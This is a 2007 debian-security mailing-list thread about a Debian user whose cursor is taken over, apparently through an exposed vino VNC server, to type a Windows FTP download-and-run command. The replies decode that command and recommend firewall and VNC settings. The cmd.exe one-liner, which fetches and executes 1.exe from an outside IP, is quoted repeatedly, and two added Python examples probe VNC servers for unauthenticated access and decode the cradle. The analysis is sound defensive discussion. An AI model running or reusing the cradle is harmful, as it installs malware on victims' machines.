Re: spooky windows script
That's just what I've done: closed the VNC holes in my firewall (btw, it does
use a blacklist on incoming connections), and configured the vino-server to
not be running by default and, when it runs, to not accept any unauthorised
connections. Let's see if that does the trick.

Greetings,

Jan

> Date: 09/05/07 08:11 AM
> From: "Lee Braiden" <[EMAIL PROTECTED]>
> To: debian-security@lists.debian.org
> CC:
> Subject: Re: spooky windows script
>
> On Tuesday 08 May 2007 22:34:30 Gerardo Curiel wrote:
> > On Tue, 08-05-2007 at 22:24 +0200, Thomas Hochstein wrote:
> > > Chris Adams wrote:
> > > > Do you have a VNC server installed?
> > >
> > > | But I do have vino-server running.
> > >
> > > Yes.
> >
> > That's the problem, the same happened to me a couple of weeks ago, in my
> > Desktop (a newly installed Debian Unstable).
> >
> > Vino seems to open the vnc port to the outside without password when
> > installed by default.
>
> I would say the problem is more that his system is configured to allow any
> servers without explicit authorisation. That could just as easily have been
> a trojan or rootkit opening a port. Best to set up your firewall to block
> all incoming connections by default, and explicitly allow only what your
> system is actually serving, and only to machines it needs to serve.
>
> --
> Lee
Re: spooky windows script
On Tuesday 08 May 2007 22:34:30 Gerardo Curiel wrote:
> On Tue, 08-05-2007 at 22:24 +0200, Thomas Hochstein wrote:
> > Chris Adams wrote:
> > > Do you have a VNC server installed?
> >
> > | But I do have vino-server running.
> >
> > Yes.
>
> That's the problem, the same happened to me a couple of weeks ago, in my
> Desktop (a newly installed Debian Unstable).
>
> Vino seems to open the vnc port to the outside without password when
> installed by default.

I would say the problem is more that his system is configured to allow any
servers without explicit authorisation. That could just as easily have been
a trojan or rootkit opening a port. Best to set up your firewall to block all
incoming connections by default, and explicitly allow only what your system
is actually serving, and only to machines it needs to serve.

--
Lee
Re: spooky windows script
On Tue, May 08, 2007 at 05:34:30PM -0400, Gerardo Curiel wrote:
> On Tue, 08-05-2007 at 22:24 +0200, Thomas Hochstein wrote:
> > Chris Adams wrote:
> >
> > > Do you have a VNC server installed?
> >
> > | But I do have vino-server running.
>
> That's the problem, the same happened to me a couple of weeks ago, in my
> Desktop (a newly installed Debian Unstable).
>
> Vino seems to open the vnc port to the outside without password when
> installed by default.

No, vino doesn't do anything by default (just confirmed in sid). What do
you have configured in System -> Preferences -> Remote Desktop?

By default, nobody can connect at all. Clicking on the only initially
active checkbox ("Allow other users to view your desktop") results in a
configuration where other users can connect, but they can't actually view
or control your desktop until you've approved their connection via a popup
dialog.

If you uncheck "Ask you for confirmation" and neglect to check "Require the
user to enter this password" and provide a password, then it seems that
unauthenticated, unapproved connections are allowed. IMO this should never
ever be allowed, but it is. It's definitely not the default state, though.

noah
Re: spooky windows script
On Tue, 08-05-2007 at 22:24 +0200, Thomas Hochstein wrote:
> Chris Adams wrote:
>
> > Do you have a VNC server installed?
>
> | But I do have vino-server running.
>
> Yes.

That's the problem, the same happened to me a couple of weeks ago, in my
Desktop (a newly installed Debian Unstable).

Vino seems to open the vnc port to the outside without password when
installed by default.

--
Gerardo Curiel <[EMAIL PROTECTED]> <[EMAIL PROTECTED]>
Geek By NaTure,LiNuX By ChOiCe,DebiAn of CoUrsE
gpg fingerprint: 228B 0F96 8653 DF52 9740 B75E FB32 9C30 E179 7BD2
http://www.debian.org
Re: spooky windows script
Chris Adams wrote:

> Do you have a VNC server installed?

| But I do have vino-server running.

Yes.

--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: spooky windows script
On Tue, 8 May 2007 18:17:08 +0200 (CEST)
Jan Outhuis <[EMAIL PROTECTED]> wrote:

> Well,
>
> to specify on this, I am running Debian testing, and surfing with Firefox
> 2.0.
>
> The script gets typed in any window that's active at the moment the cursor
> is being taken over: it may be the Firefox 'find'-field or a terminal
> window for that matter.
>
> I've checked my filesystem and no 1.exe file seems to be present.
>
> My IP-address is assigned dynamically by my ISP; it differs every time I
> log in. But I do have vino-server running. I'm going to check on that.
>
> thanks

Just for the record, I apparently interpreted the ftp business backward in
my earlier post; pulling in, not sending out.

Celejar
--
mailmin.sourceforge.net - remote access via secure (OpenPGP) email
ssuds.sourceforge.net - A Simple Sudoku Solver and Generator
Re: spooky windows script
On May 8, 2007, at 9:17 AM, Jan Outhuis wrote:

> The script gets typed in any window that's active at the moment the cursor
> is being taken over: it may be the Firefox 'find'-field or a terminal
> window for that matter.

Do you have a VNC server installed? If so you really want to either remove
it or configure it to only listen on localhost so you can access it over an
SSH tunnel but remote attackers can't get in.

I'd also strongly recommend that you configure the built-in firewall since
you may have other exposed services - unfortunately I don't have a package
recommendation as I just configure iptables directly.

I've seen this happen a couple of times on Macs where people inadvertently
left VNC open w/o a password with very similar behaviour, which suggests
people are scanning for vulnerable VNC installs but the automated stuff
currently only has Windows exploits.

Chris
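A way to verify the state Chris warns about (a VNC server answering from outside, possibly with no password), added here as an example; it is not code from the list, from vino or from Debian. It speaks the first two steps of the RFB handshake as specified in RFC 6143 (read the server's "RFB xxx.yyy" version string, echo a version, read the list of security types) and reports what the server offers. Security type 1 ("None") means a session starts without any password, which is the vino state Noah describes further up the page. The fake server in the block is a constructed stand-in so the check runs offline; the function names, the host/port arguments and the verdict strings are the example's own.

```python
"""Probe a VNC (RFB) server and report whether it offers unauthenticated
access. Added example for this thread; not code from the list or from vino.
"""
import socket
import struct
import threading

SEC_NONE = 1          # RFB security type "None": no authentication at all
SEC_VNC_AUTH = 2      # "VNC Authentication": DES challenge/response password
SECURITY_NAMES = {0: "Invalid", 1: "None", 2: "VNC Authentication",
                  5: "RA2", 16: "Tight", 18: "TLS", 19: "VeNCrypt"}


def _recv_exact(sock, n):
    """Read exactly n bytes; RFB handshake fields are fixed-size."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection mid-handshake")
        buf += chunk
    return buf


def _parse_version(banner):
    """'RFB 003.008\\n' -> (3, 8); anything else is not an RFB server."""
    if len(banner) != 12 or not banner.startswith(b"RFB ") or banner[11:12] != b"\n":
        raise ValueError("not an RFB banner: %r" % banner)
    return int(banner[4:7]), int(banner[8:11])


def _read_reason(sock):
    """Refusal reason: U32 length followed by that many bytes of text."""
    length = struct.unpack(">I", _recv_exact(sock, 4))[0]
    return _recv_exact(sock, length).decode("latin-1", "replace")


def probe_vnc(host, port=5900, timeout=3.0):
    """Return {"version": (maj, min), "types": [...], "reason": str or None}."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        banner = _recv_exact(s, 12)
        version = _parse_version(banner)
        s.sendall(banner)                       # echo the server's own version
        if version >= (3, 7):
            count = _recv_exact(s, 1)[0]        # U8 number-of-security-types
            if count == 0:                      # refused; a reason string follows
                return {"version": version, "types": [], "reason": _read_reason(s)}
            types = list(_recv_exact(s, count))
        else:                                   # RFB 3.3: server dictates one U32 type
            sec = struct.unpack(">I", _recv_exact(s, 4))[0]
            if sec == 0:
                return {"version": version, "types": [], "reason": _read_reason(s)}
            types = [sec]
    return {"version": version, "types": types, "reason": None}


def assess(result):
    """Turn a probe result into the one-line verdict a scanner would print."""
    if result["reason"] is not None:
        return "refused: " + result["reason"]
    names = ", ".join(SECURITY_NAMES.get(t, "type %d" % t) for t in result["types"])
    if SEC_NONE in result["types"]:
        return "EXPOSED: unauthenticated access offered (%s)" % names
    return "authentication required (%s)" % names


def fake_vnc_server(sec_types, version=b"RFB 003.008\n"):
    """Constructed stand-in for a VNC server on 127.0.0.1 (test aid, not vino).
    Serves a single handshake advertising `sec_types`; returns (port, thread)."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve():
        conn, _ = srv.accept()
        with conn:
            conn.sendall(version)
            _recv_exact(conn, 12)               # client's version string
            if _parse_version(version) >= (3, 7):
                conn.sendall(bytes([len(sec_types)]) + bytes(sec_types))
            else:
                conn.sendall(struct.pack(">I", sec_types[0]))
        srv.close()

    t = threading.Thread(target=serve, daemon=True)
    t.start()
    return port, t


if __name__ == "__main__":
    import sys
    host = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 5900
    print(assess(probe_vnc(host, port)))
```

Run it against your own public address from a host outside your network. A connection that is not refused means the firewall is not closing the port; an "EXPOSED" verdict means a session would start with no password at all. With vino bound to localhost and reached over an SSH tunnel, as Chris suggests, the external probe cannot connect in the first place.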
Re: spooky windows script
> Well,
>
> to specify on this, I am running Debian testing, and surfing with Firefox 2.0.
>
> The script gets typed in any window that's active at the moment the cursor is
> being taken over: it may be the Firefox 'find'-field or a terminal window for
> that matter.
>
> I've checked my filesystem and no 1.exe file seems to be present.
>
> My IP-address is assigned dynamically by my ISP; it differs every time I log
> in. But I do have vino-server running. I'm going to check on that.
>
> thanks
>
> > Date: 08/05/07 04:15 PM
> > From: "David Clymer" <[EMAIL PROTECTED]>
> > To: debian-security@lists.debian.org
> > CC:
> > Subject: Re: spooky windows script
> >
> > On Tue, 2007-05-08 at 14:57 +0200, Jan Outhuis wrote:
> > > Hello,
> > >
> > > Recently I'm repeatedly being pestered by a strange event while surfing
> > > the net. My cursor is taken over and the following code is typed:
> > >
> > > %systemroot%\system32\cmd.exe
> > > cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit
> > >
> > > (I see on my network monitor that this is coming from outside; IP-number
> > > and user name vary.)
> > >
> > > After that all is back to normal.
> > >
> > > Now this is of course a nuisance, but is it also a threat? And what can
> > > be done against it?
> > >
> > > Anybody got a clue on this?
> > >
> >
> > I'm sure someone has a clue. However, clued listmembers or not, a
> > windows security issue is not an appropriate topic for discussion on a
> > mailing list called "debian-security". As the name implies, this list is
> > for discussing security issues as they relate to the Debian GNU/Linux
> > distribution.
> >
> > -davidc
> >
> > --
> > A good hot dog feeds the hand that bites it.
Re: spooky windows script
On Tue, 2007-05-08 at 14:57 +0200, Jan Outhuis wrote:
> Hello,
>
> Recently I'm repeatedly being pestered by a strange event while surfing the
> net. My cursor is taken over and the following code is typed:
>
> %systemroot%\system32\cmd.exe
> cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit
>
> (I see on my network monitor that this is coming from outside; IP-number and
> user name vary.)
>
> After that all is back to normal.
>
> Now this is of course a nuisance, but is it also a threat? And what can be
> done against it?
>
> Anybody got a clue on this?
>

I'm sure someone has a clue. However, clued listmembers or not, a
windows security issue is not an appropriate topic for discussion on a
mailing list called "debian-security". As the name implies, this list is
for discussing security issues as they relate to the Debian GNU/Linux
distribution.

-davidc

--
A good hot dog feeds the hand that bites it.
Re: spooky windows script
hi,

> %systemroot%\system32\cmd.exe
> cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit

to clarify what this command line does: it writes the following text lines
in a file called "ik":

open 59.31.153.120 22783
user db database
get 1.exe
bye

these are FTP commands, which are now being executed by the windows FTP
client. the parameters -n -v suppress user autologin and verboseness, and
the parameter -s:ik executes the content of the file "ik" as FTP commands.
the file ftp://db:database@59.31.153.120:22783/1.exe is being fetched, the
file "ik" is then being deleted and finally the file "1.exe" is being
executed.

i suppose that 1.exe is some kind of windows trojan or virus.

cheers,
-stephan loh

On 2007.05.08 15:39, Celejar wrote:
> On Tue, 8 May 2007 14:57:24 +0200 (CEST)
> Jan Outhuis <[EMAIL PROTECTED]> wrote:
>
> > Hello,
> >
> > Recently I'm repeatedly being pestered by a strange event while surfing the
> > net. My cursor is taken over and the following code is typed:
> >
> > %systemroot%\system32\cmd.exe
> > cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit
> >
> > (I see on my network monitor that this is coming from outside; IP-number
> > and user name vary.)
> >
> > After that all is back to normal.
> >
> > Now this is of course a nuisance, but is it also a threat? And what can be
> > done against it?
> >
> > Anybody got a clue on this?
> >
> > Tia,
> >
> > Jan Outhuis
>
> Are you running linux or windows? With what program are you surfing?
> Where is that text displayed? The cmd.exe line looks like someone
> trying to open the windows command shell; the next line looks like
> someone trying to capture some data from your system and ftp it
> outwards. I'm just guessing, but it does appear to be a threat.
>
> Celejar
> --
> mailmin.sourceforge.net - remote access via secure (OpenPGP) email
> ssuds.sourceforge.net - A Simple Sudoku Solver and Generator
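The same decoding done mechanically, as an added example that is not part of the original post: it replays the `echo ... >> ik` commands into an in-memory file, parses that file as an ftp.exe script (the `-s:` argument), and lists what the cradle would fetch, delete and run. The sample input is the command line quoted above; the function and field names are the example's own, and only the constructs that line uses (echo with redirection, ftp -s:, del, running a fetched file, exit) are understood, with anything else collected under "other" rather than silently dropped.

```python
"""Decode a cmd.exe FTP "download cradle" of the kind typed into the
reporter's windows. Added example for this thread; not code from the list.
"""
import re

# The command line quoted in the original report, used here as sample input.
SAMPLE = ("cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik "
          "&echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit")

# `echo TEXT >> FILE` (or `> FILE`): the text before the redirection lands in FILE.
ECHO_RE = re.compile(r"^echo\s+(?P<text>.*?)\s*>>?\s*(?P<file>\S+)$", re.I)
# `ftp [-n] [-v] ... -s:FILE`: run FILE as an ftp.exe script.
FTP_RE = re.compile(r"^ftp\b.*?-s:(?P<file>\S+)", re.I)
# Optional leading `%systemroot%\system32\cmd.exe /c` or `cmd /c`.
CMD_PREFIX_RE = re.compile(r"^\s*(?:%systemroot%\\system32\\)?cmd(?:\.exe)?\s+/c\s+", re.I)


def split_cmd(line):
    """Split a cmd.exe one-liner on '&' / '&&', dropping a leading 'cmd /c'."""
    line = CMD_PREFIX_RE.sub("", line)
    return [p.strip() for p in re.split(r"&&?", line) if p.strip()]


def parse_ftp_script(text):
    """Interpret the ftp.exe script verbs a cradle relies on."""
    info = {"host": None, "port": 21, "user": None, "password": None, "downloads": []}
    for raw in text.splitlines():
        parts = raw.split()
        if not parts:
            continue
        verb, args = parts[0].lower(), parts[1:]
        if verb == "open" and args:                      # open HOST [PORT]
            info["host"] = args[0]
            if len(args) > 1 and args[1].isdigit():
                info["port"] = int(args[1])
        elif verb == "user" and args:                    # user NAME [PASSWORD]
            info["user"] = args[0]
            info["password"] = args[1] if len(args) > 1 else None
        elif verb in ("get", "recv") and args:           # get REMOTE [LOCAL]
            info["downloads"].append(args[1] if len(args) > 1 else args[0])
        elif verb in ("bye", "quit"):
            break
    return info


def decode_cradle(line):
    """Walk the command list and report the cradle's effects on the host."""
    files = {}                                           # virtual files written by echo
    report = {"script_file": None, "ftp": None, "deleted": [], "executed": [], "other": []}
    for cmd in split_cmd(line):
        m = ECHO_RE.match(cmd)
        if m:
            files[m.group("file")] = files.get(m.group("file"), "") + m.group("text") + "\n"
            continue
        m = FTP_RE.match(cmd)
        if m:
            report["script_file"] = m.group("file")
            report["ftp"] = parse_ftp_script(files.get(m.group("file"), ""))
            continue
        words = cmd.split()
        if words[0].lower() in ("del", "erase"):         # cleanup of the script file
            report["deleted"].extend(words[1:])
        elif report["ftp"] and words[0] in report["ftp"]["downloads"]:
            report["executed"].append(words[0])          # runs the file it just fetched
        elif words[0].lower() != "exit":
            report["other"].append(cmd)
    return report


def ftp_url(report):
    """The fetch as one URL, convenient for a block rule or a lookup."""
    f = report["ftp"]
    if not f or not f["host"] or not f["downloads"]:
        return None
    auth = ""
    if f["user"]:
        auth = f["user"] + (":" + f["password"] if f["password"] else "") + "@"
    return "ftp://%s%s:%d/%s" % (auth, f["host"], f["port"], f["downloads"][0])


if __name__ == "__main__":
    r = decode_cradle(SAMPLE)
    print("fetches  :", ftp_url(r))
    print("executes :", r["executed"])
    print("deletes  :", r["deleted"])
```

Pointing the decoder at a line taken from a keystroke log or an IDS alert yields the host, port, credentials and payload name in one step, which is what you want to block at the firewall or look up, without running anything from the line itself.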
Re: spooky windows script
If this occurred on my Windows box, I would back up what needs to be backed
up and reload the OS with something useful. Your machine has clearly been
compromised.

--

On Tue, 8 May 2007, Celejar wrote:

> On Tue, 8 May 2007 14:57:24 +0200 (CEST)
> Jan Outhuis <[EMAIL PROTECTED]> wrote:
>
> > Hello,
> >
> > Recently I'm repeatedly being pestered by a strange event while surfing the
> > net. My cursor is taken over and the following code is typed:
> >
> > %systemroot%\system32\cmd.exe
> > cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit
> >
> > (I see on my network monitor that this is coming from outside; IP-number and
> > user name vary.)
> >
> > After that all is back to normal.
> >
> > Now this is of course a nuisance, but is it also a threat? And what can be
> > done against it?
> >
> > Anybody got a clue on this?
> >
> > Tia,
> >
> > Jan Outhuis
>
> Are you running linux or windows? With what program are you surfing?
> Where is that text displayed? The cmd.exe line looks like someone
> trying to open the windows command shell; the next line looks like
> someone trying to capture some data from your system and ftp it
> outwards. I'm just guessing, but it does appear to be a threat.
>
> Celejar
> --
> mailmin.sourceforge.net - remote access via secure (OpenPGP) email
> ssuds.sourceforge.net - A Simple Sudoku Solver and Generator
Re: spooky windows script
On Tue, 8 May 2007 14:57:24 +0200 (CEST)
Jan Outhuis <[EMAIL PROTECTED]> wrote:

> Hello,
>
> Recently I'm repeatedly being pestered by a strange event while surfing the
> net. My cursor is taken over and the following code is typed:
>
> %systemroot%\system32\cmd.exe
> cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit
>
> (I see on my network monitor that this is coming from outside; IP-number and
> user name vary.)
>
> After that all is back to normal.
>
> Now this is of course a nuisance, but is it also a threat? And what can be
> done against it?
>
> Anybody got a clue on this?
>
> Tia,
>
> Jan Outhuis

Are you running linux or windows? With what program are you surfing?
Where is that text displayed? The cmd.exe line looks like someone
trying to open the windows command shell; the next line looks like
someone trying to capture some data from your system and ftp it
outwards. I'm just guessing, but it does appear to be a threat.

Celejar
--
mailmin.sourceforge.net - remote access via secure (OpenPGP) email
ssuds.sourceforge.net - A Simple Sudoku Solver and Generator
Re: spooky windows script
On Tue, 8 May 2007 14:57:24 +0200 (CEST)
Jan Outhuis <[EMAIL PROTECTED]> wrote:

> Hello,
>
> Recently I'm repeatedly being pestered by a strange event while
> surfing the net. My cursor is taken over and the following code is
> typed:
>
> %systemroot%\system32\cmd.exe
> cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit
>
> (I see on my network monitor that this is coming from outside;
> IP-number and user name vary.)
>
> After that all is back to normal.
>
> Now this is of course a nuisance, but is it also a threat? And what
> can be done against it?
>
> Anybody got a clue on this?
>
> Tia,
>
> Jan Outhuis
>

Do you have any kind of VNC-servers running? What is your ip-address? Can
I scan your open ports from it?

---
Henri Salo
+358407705733
GPG ID: 2EA46E4F
fp: 14D0 7803 BFF6 EFA0 9998 8C4B 5DFE A106 2EA4 6E4F
Re: spooky windows script
On Tue, May 08, 2007 at 02:57:24PM +0200, Jan Outhuis wrote:
> %systemroot%\system32\cmd.exe
> cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit

If you were running a windows system this might do something really nasty
since it creates a download script and executes it. Perhaps to pull in a
root kit? I haven't done DOS in a long time so I am a bit shaky in fully
interpreting. Check for something named 1.exe in your directory.